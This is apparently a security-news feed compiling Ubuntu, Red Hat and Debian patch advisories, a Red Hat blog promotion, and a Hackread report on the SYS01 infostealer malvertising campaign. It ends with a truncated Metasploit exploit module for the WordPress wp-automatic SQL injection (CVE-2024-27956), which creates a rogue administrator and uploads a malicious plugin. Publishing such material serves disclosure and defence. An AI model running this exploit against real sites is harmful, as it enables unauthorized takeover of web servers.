Ubuntu Security Notice 7021-5 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7021-5October 31, 2024linux-azure-fde vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - BTRFS file system;  - F2FS file system;  - GFS2 file system;  - BPF subsystem;  - Netfilter;  - RxRPC session sockets;  - Integrity Measurement Architecture(IMA) framework;(CVE-2024-27012, CVE-2024-38570, CVE-2024-42228, CVE-2024-41009,CVE-2024-39494, CVE-2024-42160, CVE-2024-39496, CVE-2024-26677)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1073-azure-fde  5.15.0-1073.82.1  linux-image-azure-fde-lts-22.04  5.15.0.1073.82.50After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7021-5  https://ubuntu.com/security/notices/USN-7021-4  https://ubuntu.com/security/notices/USN-7021-3  https://ubuntu.com/security/notices/USN-7021-2  https://ubuntu.com/security/notices/USN-7021-1  CVE-2024-26677, CVE-2024-27012, CVE-2024-38570, CVE-2024-39494,  CVE-2024-39496, CVE-2024-41009, CVE-2024-42160, CVE-2024-42228Package Information:  https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1073.82.1

Ubuntu Security Notice USN-7021-5

Red Hat Security Advisory 2024-8680-03 - An update for mod_http2 is now available for Red Hat Enterprise Linux 9. Issues addressed include denial of service and null pointer vulnerabilities.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8680.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: mod_http2 security updateAdvisory ID:        RHSA-2024:8680-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8680Issue date:         2024-10-31Revision:           03CVE Names:          CVE-2024-36387====================================================================Summary: An update for mod_http2 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The mod_h2 Apache httpd module implements the HTTP2 protocol (h2+h2c) on top of libnghttp2 for httpd 2.4 servers.Security Fix(es):* mod_http2: DoS by null pointer in websocket over HTTP/2 (CVE-2024-36387)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-36387References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2295006

Red Hat Security Advisory 2024-8680-03

Red Hat Security Advisory 2024-8679-03 - An update for podman is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8679.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: podman security updateAdvisory ID:        RHSA-2024:8679-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8679Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-9675====================================================================Summary: An update for podman is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods is a concept in Kubernetes.Security Fix(es):* buildah: Buildah allows arbitrary directory mount (CVE-2024-9675)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9675References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2317458

Red Hat Security Advisory 2024-8679-03

Red Hat Security Advisory 2024-8678-03 - An update for grafana is now available for Red Hat Enterprise Linux 9.4 Extended Update Support. Issues addressed include a cross site scripting vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8678.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: grafana security updateAdvisory ID:        RHSA-2024:8678-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8678Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-9355====================================================================Summary: An update for grafana is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Security Fix(es):* golang-fips: Golang FIPS zeroed buffer (CVE-2024-9355)* dompurify: nesting-based mutation XSS vulnerability (CVE-2024-47875)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9355References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2315719https://bugzilla.redhat.com/show_bug.cgi?id=2318052

Red Hat Security Advisory 2024-8678-03

Red Hat Security Advisory 2024-8676-03 - Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8676.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, & Bug Fix Update  
Advisory ID:        RHSA-2024:8676-03  
Product:            Red Hat OpenShift Data Foundation  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8676  
Issue date:         2024-10-30  
Revision:           03  
CVE Names:          CVE-2023-26136  
====================================================================

Summary: 

Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.

Description:

Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.

These updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:

https://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index

All Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-26136

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2059669  
https://bugzilla.redhat.com/show_bug.cgi?id=2190161  
https://bugzilla.redhat.com/show_bug.cgi?id=2219310  
https://bugzilla.redhat.com/show_bug.cgi?id=2241329  
https://bugzilla.redhat.com/show_bug.cgi?id=2245068  
https://bugzilla.redhat.com/show_bug.cgi?id=2250364  
https://bugzilla.redhat.com/show_bug.cgi?id=2253013  
https://bugzilla.redhat.com/show_bug.cgi?id=2257271  
https://bugzilla.redhat.com/show_bug.cgi?id=2259668  
https://bugzilla.redhat.com/show_bug.cgi?id=2262777  
https://bugzilla.redhat.com/show_bug.cgi?id=2268046  
https://bugzilla.redhat.com/show_bug.cgi?id=2268820  
https://bugzilla.redhat.com/show_bug.cgi?id=2271773  
https://bugzilla.redhat.com/show_bug.cgi?id=2272597  
https://bugzilla.redhat.com/show_bug.cgi?id=2275225  
https://bugzilla.redhat.com/show_bug.cgi?id=2275965  
https://bugzilla.redhat.com/show_bug.cgi?id=2276393  
https://bugzilla.redhat.com/show_bug.cgi?id=2276672  
https://bugzilla.redhat.com/show_bug.cgi?id=2279751  
https://bugzilla.redhat.com/show_bug.cgi?id=2279876  
https://bugzilla.redhat.com/show_bug.cgi?id=2280308  
https://bugzilla.redhat.com/show_bug.cgi?id=2280608  
https://bugzilla.redhat.com/show_bug.cgi?id=2280637  
https://bugzilla.redhat.com/show_bug.cgi?id=2283994  
https://bugzilla.redhat.com/show_bug.cgi?id=2292435  
https://bugzilla.redhat.com/show_bug.cgi?id=2292668  
https://bugzilla.redhat.com/show_bug.cgi?id=2294234  
https://bugzilla.redhat.com/show_bug.cgi?id=2294723  
https://bugzilla.redhat.com/show_bug.cgi?id=2297265  
https://bugzilla.redhat.com/show_bug.cgi?id=2297295  
https://bugzilla.redhat.com/show_bug.cgi?id=2297447  
https://bugzilla.redhat.com/show_bug.cgi?id=2297454  
https://bugzilla.redhat.com/show_bug.cgi?id=2299630  
https://bugzilla.redhat.com/show_bug.cgi?id=2299639  
https://bugzilla.redhat.com/show_bug.cgi?id=2300021  
https://bugzilla.redhat.com/show_bug.cgi?id=2300312  
https://bugzilla.redhat.com/show_bug.cgi?id=2300331  
https://bugzilla.redhat.com/show_bug.cgi?id=2300499  
https://bugzilla.redhat.com/show_bug.cgi?id=2301889  
https://bugzilla.redhat.com/show_bug.cgi?id=2302201  
https://bugzilla.redhat.com/show_bug.cgi?id=2302257  
https://bugzilla.redhat.com/show_bug.cgi?id=2302448  
https://bugzilla.redhat.com/show_bug.cgi?id=2302507  
https://bugzilla.redhat.com/show_bug.cgi?id=2302575  
https://bugzilla.redhat.com/show_bug.cgi?id=2302774  
https://bugzilla.redhat.com/show_bug.cgi?id=2302841  
https://bugzilla.redhat.com/show_bug.cgi?id=2302842  
https://bugzilla.redhat.com/show_bug.cgi?id=2303028  
https://bugzilla.redhat.com/show_bug.cgi?id=2303342  
https://bugzilla.redhat.com/show_bug.cgi?id=2303403  
https://bugzilla.redhat.com/show_bug.cgi?id=2303619  
https://bugzilla.redhat.com/show_bug.cgi?id=2303820  
https://bugzilla.redhat.com/show_bug.cgi?id=2303821  
https://bugzilla.redhat.com/show_bug.cgi?id=2303822  
https://bugzilla.redhat.com/show_bug.cgi?id=2303823  
https://bugzilla.redhat.com/show_bug.cgi?id=2303824  
https://bugzilla.redhat.com/show_bug.cgi?id=2303825  
https://bugzilla.redhat.com/show_bug.cgi?id=2303829  
https://bugzilla.redhat.com/show_bug.cgi?id=2304073  
https://bugzilla.redhat.com/show_bug.cgi?id=2304231  
https://bugzilla.redhat.com/show_bug.cgi?id=2304232  
https://bugzilla.redhat.com/show_bug.cgi?id=2304235  
https://bugzilla.redhat.com/show_bug.cgi?id=2304238  
https://bugzilla.redhat.com/show_bug.cgi?id=2304799  
https://bugzilla.redhat.com/show_bug.cgi?id=2304810  
https://bugzilla.redhat.com/show_bug.cgi?id=2304815  
https://bugzilla.redhat.com/show_bug.cgi?id=2304993  
https://bugzilla.redhat.com/show_bug.cgi?id=2305274  
https://bugzilla.redhat.com/show_bug.cgi?id=2305295  
https://bugzilla.redhat.com/show_bug.cgi?id=2305660  
https://bugzilla.redhat.com/show_bug.cgi?id=2305880  
https://bugzilla.redhat.com/show_bug.cgi?id=2306026  
https://bugzilla.redhat.com/show_bug.cgi?id=2306387  
https://bugzilla.redhat.com/show_bug.cgi?id=2306577  
https://bugzilla.redhat.com/show_bug.cgi?id=2307823  
https://bugzilla.redhat.com/show_bug.cgi?id=2307835  
https://bugzilla.redhat.com/show_bug.cgi?id=2307909  
https://bugzilla.redhat.com/show_bug.cgi?id=2308091  
https://bugzilla.redhat.com/show_bug.cgi?id=2308101  
https://bugzilla.redhat.com/show_bug.cgi?id=2308144  
https://bugzilla.redhat.com/show_bug.cgi?id=2308193  
https://bugzilla.redhat.com/show_bug.cgi?id=2308304  
https://bugzilla.redhat.com/show_bug.cgi?id=2308442  
https://bugzilla.redhat.com/show_bug.cgi?id=2308446  
https://bugzilla.redhat.com/show_bug.cgi?id=2309191  
https://bugzilla.redhat.com/show_bug.cgi?id=2309195  
https://bugzilla.redhat.com/show_bug.cgi?id=2309485  
https://bugzilla.redhat.com/show_bug.cgi?id=2309486  
https://bugzilla.redhat.com/show_bug.cgi?id=2309487  
https://bugzilla.redhat.com/show_bug.cgi?id=2309488  
https://bugzilla.redhat.com/show_bug.cgi?id=2309489  
https://bugzilla.redhat.com/show_bug.cgi?id=2309700  
https://bugzilla.redhat.com/show_bug.cgi?id=2310369  
https://bugzilla.redhat.com/show_bug.cgi?id=2310385  
https://bugzilla.redhat.com/show_bug.cgi?id=2310841  
https://bugzilla.redhat.com/show_bug.cgi?id=2310908  
https://bugzilla.redhat.com/show_bug.cgi?id=2311042  
https://bugzilla.redhat.com/show_bug.cgi?id=2311043  
https://bugzilla.redhat.com/show_bug.cgi?id=2311152  
https://bugzilla.redhat.com/show_bug.cgi?id=2311153  
https://bugzilla.redhat.com/show_bug.cgi?id=2311154  
https://bugzilla.redhat.com/show_bug.cgi?id=2311171  
https://bugzilla.redhat.com/show_bug.cgi?id=2311468  
https://bugzilla.redhat.com/show_bug.cgi?id=2311551  
https://bugzilla.redhat.com/show_bug.cgi?id=2311790  
https://bugzilla.redhat.com/show_bug.cgi?id=2311867  
https://bugzilla.redhat.com/show_bug.cgi?id=2311885  
https://bugzilla.redhat.com/show_bug.cgi?id=2311893  
https://bugzilla.redhat.com/show_bug.cgi?id=2312137  
https://bugzilla.redhat.com/show_bug.cgi?id=2312442  
https://bugzilla.redhat.com/show_bug.cgi?id=2313178  
https://bugzilla.redhat.com/show_bug.cgi?id=2313203  
https://bugzilla.redhat.com/show_bug.cgi?id=2313515  
https://bugzilla.redhat.com/show_bug.cgi?id=2313717  
https://bugzilla.redhat.com/show_bug.cgi?id=2313736  
https://bugzilla.redhat.com/show_bug.cgi?id=2314200  
https://bugzilla.redhat.com/show_bug.cgi?id=2314211  
https://bugzilla.redhat.com/show_bug.cgi?id=2314404  
https://bugzilla.redhat.com/show_bug.cgi?id=2314454  
https://bugzilla.redhat.com/show_bug.cgi?id=2314636  
https://bugzilla.redhat.com/show_bug.cgi?id=2315624  
https://bugzilla.redhat.com/show_bug.cgi?id=2315651  
https://bugzilla.redhat.com/show_bug.cgi?id=2315666  
https://bugzilla.redhat.com/show_bug.cgi?id=2315709  
https://bugzilla.redhat.com/show_bug.cgi?id=2315733  
https://bugzilla.redhat.com/show_bug.cgi?id=2315846  
https://bugzilla.redhat.com/show_bug.cgi?id=2318490  
https://bugzilla.redhat.com/show_bug.cgi?id=2319102  
https://bugzilla.redhat.com/show_bug.cgi?id=2319238

Red Hat Security Advisory 2024-8676-03

Red Hat Security Advisory 2024-8675-03 - An update for buildah is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8675.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: buildah security updateAdvisory ID:        RHSA-2024:8675-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8675Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-9675====================================================================Summary: An update for buildah is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es):* buildah: Buildah allows arbitrary directory mount (CVE-2024-9675)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9675References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2317458

Red Hat Security Advisory 2024-8675-03

Vulcan collaborated with Red Hat to optimize Vulcan Cyber with Red Hat Insights and provide businesses with a holistic view of exposure risk across all attack surfaces and asset types.According to Vulcan, “By harnessing Red Hat Insights’ deep visibility into host vulnerabilities, paired with the Vulcan Cyber holistic view, intelligent risk scoring and automated workflows, your teams will be empowered to resolve issues faster, enhance collaboration between security and IT teams, and ultimately reduce the risk of security breaches.”Red Hat Insights can help you better understand your secur

Vulcan collaborated with Red Hat to optimize Vulcan Cyber with Red Hat Insights and provide businesses with a holistic view of exposure risk across all attack surfaces and asset types.

According to Vulcan, “By harnessing Red Hat Insights’ deep visibility into host vulnerabilities, paired with the Vulcan Cyber holistic view, intelligent risk scoring and automated workflows, your teams will be empowered to resolve issues faster, enhance collaboration between security and IT teams, and ultimately reduce the risk of security breaches.”

Red Hat Insights can help you better understand your security risk and exposure in the form of vulnerabilities, malware, and regulatory compliance.  Red Hat Insights is included with your existing Red Hat Enterprise Linux, Red Hat OpenShift, and Red Hat Ansible Automation Platform subscriptions. To learn more about Insights visit our Red Hat Insights product page.

To learn more from Vulcan, navigate to these key links:

Read the blog

Download the PDF

Enter keywords here to search blogs

UI\_Icon-Red\_Hat-Close-A-Black-RGB

**Browse by channel**

**Automation**

The latest on IT automation for tech, teams, and environments

**Security**

The latest on how we reduce risks across environments and technologies

**Edge computing**

Updates on the platforms that simplify operations at the edge

**Infrastructure**

The latest on the world’s leading enterprise Linux platform

**Applications**

Inside our solutions to the toughest application challenges

**Original shows**

Entertaining stories from the makers and leaders in enterprise tech

Red Hat Insights collaborated with Vulcan Cyber to provide a seamless integration for effective exposure management 

A malvertising campaign is exploiting Meta’s platform to spread SYS01 infostealer, targeting men 45+ via fake ads for…

A malvertising campaign is exploiting Meta’s platform to spread SYS01 infostealer, targeting men 45+ via fake ads for popular software. The malware steals Facebook credentials, hijacks accounts espicially those administrating business pages, and spreads further attacks globally.

A new malvertising campaign is exploiting Meta’s advertising platform to spread the **SYS01 infostealer**, a cybersecurity threat known to Meta and particularly Facebook users for stealing their personal information.

What makes this attack targeted is that millions of users globally, specifically men aged 45 and above, are potential victims of this ongoing attack, which cleverly disguises itself as advertisements for popular software, games, and online services.

This campaign, first detected in September 2024, stands out due to its impersonation tactics and popular brands that it exploits. Instead of focusing on a single lure, the attackers mimic a broad range of trusted brands, including productivity tools like Office 365, creative software like Canva and Adobe Photoshop, VPN services like ExpressVPN, streaming platforms like Netflix, messaging apps like Telegram, and even popular video games like Super Mario Bros Wonder.

****How the Attack Works:****

According to Bitdefender’s **blog post** shared with Hackread.com ahead of publishing on Wednesday, the malicious ads often lead to MediaFire links offering direct downloads of seemingly legitimate software. These downloads, packaged as zip archives, contain a malicious Electron application.

Once executed, this application drops and **runs the SYS01 infostealer**, often while displaying a decoy app that mimics the advertised software. This deceptive tactic makes it difficult for victims to realize they’ve been compromised.

For your information, an Electron application is a type of desktop app built with web technologies like HTML, CSS, and JavaScript. Electron is an open-source framework developed by GitHub that allows developers to create cross-platform applications that run on Windows, macOS, and Linux, all from a single codebase.

In this attack however, behind the scenes, the Electron app uses obfuscated Javascript code and a standalone 7zip executable to extract a password-protected archive containing the core malware components. This archive includes PHP scripts responsible for **installing the infostealer** and establishing persistence on the victim’s system. The malware also incorporates anti-sandbox checks to evade detection by security researchers.

****Stealing Data and Hijacking Accounts:****

The primary goal of the SYS01 infostealer is to harvest Facebook credentials, particularly those associated with business accounts. These compromised accounts are then used to further attacks/scams.

What’s worse, the attack also leverages the advertising capabilities of hijacked accounts, allowing attackers to create **new malicious ads** that appear more legitimate and easily bypass security filters. This creates a self-sustaining cycle where stolen accounts are used to spread the malware even further. The stolen credentials are also likely sold on underground marketplaces, further enriching the criminals.

Fake Netflix, Super Mario Bros. Wonder, and other malicious ads are currently being used in the campaign (Via Bitdefender)

****Global Reach and Protection****

While the campaign has a global reach, impacting users in the EU, North America, Australia, and Asia, Bitdefender could not verify the full extent of its impact, especially outside the EU, which remains unclear due to limited data transparency.

Nevertheless, if you are on Facebook—especially if you run a business page—you must watch out for SYS01 Infostealer and **similar threats**. While using common sense is essential, here are some vital steps you should take:

1.  **Monitor your accounts:** Regularly check your Facebook and other social media accounts for suspicious activity. Report any unauthorized access immediately and change your passwords.
2.  **Be wary of ads:** Exercise caution when clicking on ads, especially those offering free downloads or deals that seem too good to be true. Verify the source before downloading any software.
3.  **Stick to official sources:** Download software directly from official websites or trusted app stores. Avoid third-party platforms and file-sharing services.
4.  **Use strong security software:** Install reputable security software and keep it updated. Choose a solution that offers real-time protection and advanced threat detection.
5.  **Enable two-factor authentication (2FA):** Activate 2FA on your Facebook and other important online accounts for added security.

1.  **Fake GTA VI Beta Download Spreads Malware**
2.  **ALPHV Ransomware Uses Google Ads to Target Victims**
3.  **Fake WhatsApp clone steals crypto on Android and Windows**
4.  **Facebook, Meta, Apple, Amazon Most Impersonated in Scams**
5.  **Fake ChatGPT and Facebook Ads Used in DNS Investment Scam**

Fake Meta Ads Hijacking Facebook Accounts to Spread SYS01 Infostealer

Debian Linux Security Advisory 5800-1 - Jan-Niklas Sohn discovered that a heap-based buffer overflow in the _XkbSetCompatMap function in the X Keyboard Extension of the X.org X server may result in privilege escalation if the X server is running privileged.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5800-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
October 29, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : xorg-server  
CVE ID         : CVE-2024-9632  
Debian Bug     : 1086244

Jan-Niklas Sohn discovered that a heap-based buffer overflow in the  
_XkbSetCompatMap function in the X Keyboard Extension of the X.org X  
server may result in privilege escalation if the X server is running  
privileged.

For the stable distribution (bookworm), this problem has been fixed in  
version 2:21.1.7-3+deb12u8.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmchKQNfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0S1og//Qc+fk1SZNKINd1d/ItoR5XQQGU4V92/kQKcfNu97F2DLcb1wUc+BZAaY  
yr1HS+ru3pY25XOKYLgR7Tx///BEXzYxKdNxLGVMXzJqU06oSYXAkUBERFW5aU0/  
ayaV+UtwaX7ADUwYpCeJbQJcudMw3YtPlkRpN1uCs/lHMHPcbsGpZt4VBpItksrs  
iRpqq40eQiPafzGBpzx40ejaJyn200s9hYNN6dieqNDQTW6MmGSI9OLfY5alze6M  
Iot3mopREg/iKJblNz7+T2mKng0TEPY2PgolcsmHjvHEKCrWmWcGKwWHKlbvfpJX  
s1522AAWS5aJeW8r6TeGbOa298caLsW4doQa/6EX4HeADQu7SjV9oXZwrUtGsCxn  
eb6oLUGhHs0FGmY/Hvfng/ouZwSj1wKWE45hMCJ1HRSlpbfCoJxQlFpNLWQziFaS  
TuzebmpPXfbrbcXb7tNgUPtLcayu09JwJWxZLYPYcFDXZe1wUz3ZQIWkKHizXkSI  
NZtQYdLMKqBp99XR65vkTORS7QWkpdaW6AY6JujoihKFzh+wRM7qKtgflHl6qTLd  
mPK8DU/qe5jCs5oqzLvQ7sZUb95JqhYaLf8ZWH6koTHLHqnMt9wOxqoEPoFfk4Lz  
TH0FizIOHO6imr6USG+ubOtlf/nd1py1achR9ihKtd+0GE0Hx8Q=  
=Y9nq  
-----END PGP SIGNATURE-----

Debian Security Advisory 5800-1

This Metasploit module exploits an unauthenticated SQL injection vulnerability in the WordPress wp-automatic plugin versions prior to 3.92.1 to achieve remote code execution. The vulnerability allows the attacker to inject and execute arbitrary SQL commands, which can be used to create a malicious administrator account. The password for the new account is hashed using MD5. Once the administrator account is created, the attacker can upload and execute a malicious plugin, leading to full control over the WordPress site.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class SQLExecutionError < RuntimeError; endclass MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Payload::Php  include Msf::Exploit::FileDropper  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Exploit::Remote::HTTP::Wordpress::SQLi  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WordPress wp-automatic Plugin SQLi Admin Creation',        'Description' => %q{          This module exploits an unauthenticated SQL injection vulnerability in the WordPress wp-automatic plugin (versions < 3.92.1)          to achieve remote code execution (RCE). The vulnerability allows the attacker to inject and execute arbitrary SQL commands,          which can be used to create a malicious administrator account. The password for the new account is hashed using MD5.          Once the administrator account is created, the attacker can upload and execute a malicious plugin, leading to full control          over the WordPress site.        },        'Author' => [          'Rafie Muhammad',   # Vulnerability discovery          'Valentin Lobstein' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-27956'],          ['WPVDB', '53a51e79-a216-4ca3-ac2d-57098fd2ebb5'],          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-automatic/automatic-3920-unauthenticated-sql-injection'],          ['URL', 'https://patchstack.com/articles/critical-vulnerabilities-patched-in-wordpress-automatic-plugin/']        ],        'Platform' => %w[php unix linux win],        'Arch' => [ARCH_PHP, ARCH_CMD],        'DisclosureDate' => '2024-03-13',        'DefaultTarget' => 0,        'Privileged' => false,        'Targets' => [          [            'PHP In-Memory',            {              'Platform' => 'php',              'Arch' => ARCH_PHP              # tested with php/meterpreter/reverse_tcp            }          ],          [            'Unix/Linux Command Shell',            {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows Command Shell',            {              'Platform' => 'win',              'Arch' => ARCH_CMD              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp            }          ]        ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('USERNAME', [false, 'Username to create', Faker::Internet.username]),        OptString.new('PASSWORD', [false, 'Password for the new user', Faker::Internet.password(min_length: 8)]),        OptString.new('EMAIL', [false, 'Email for the new user', Faker::Internet.email])      ]    )  end  def create_sqli_instance    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|      execute_sql_query(payload)    end  end  def execute_sql_query(query)    formatted_query = query.strip.upcase.start_with?('INSERT') ? query : "SELECT (#{query})"    response = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-automatic', 'inc', 'csv.php'),      'method' => 'POST',      'vars_post' => {        'q' => formatted_query,        'auth' => "\0",        'integ' => Rex::Text.md5(formatted_query)      }    })    raise SQLExecutionError, "Failed to execute SQL query: #{query}" unless response    response  end  def upload_and_execute_payload(admin_cookie)    plugin_name = Faker::App.name.gsub(/\s+/, '').downcase    payload_name = Faker::Hacker.noun.gsub(/\s+/, '').downcase    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")    zip = generate_plugin(plugin_name, payload_name)    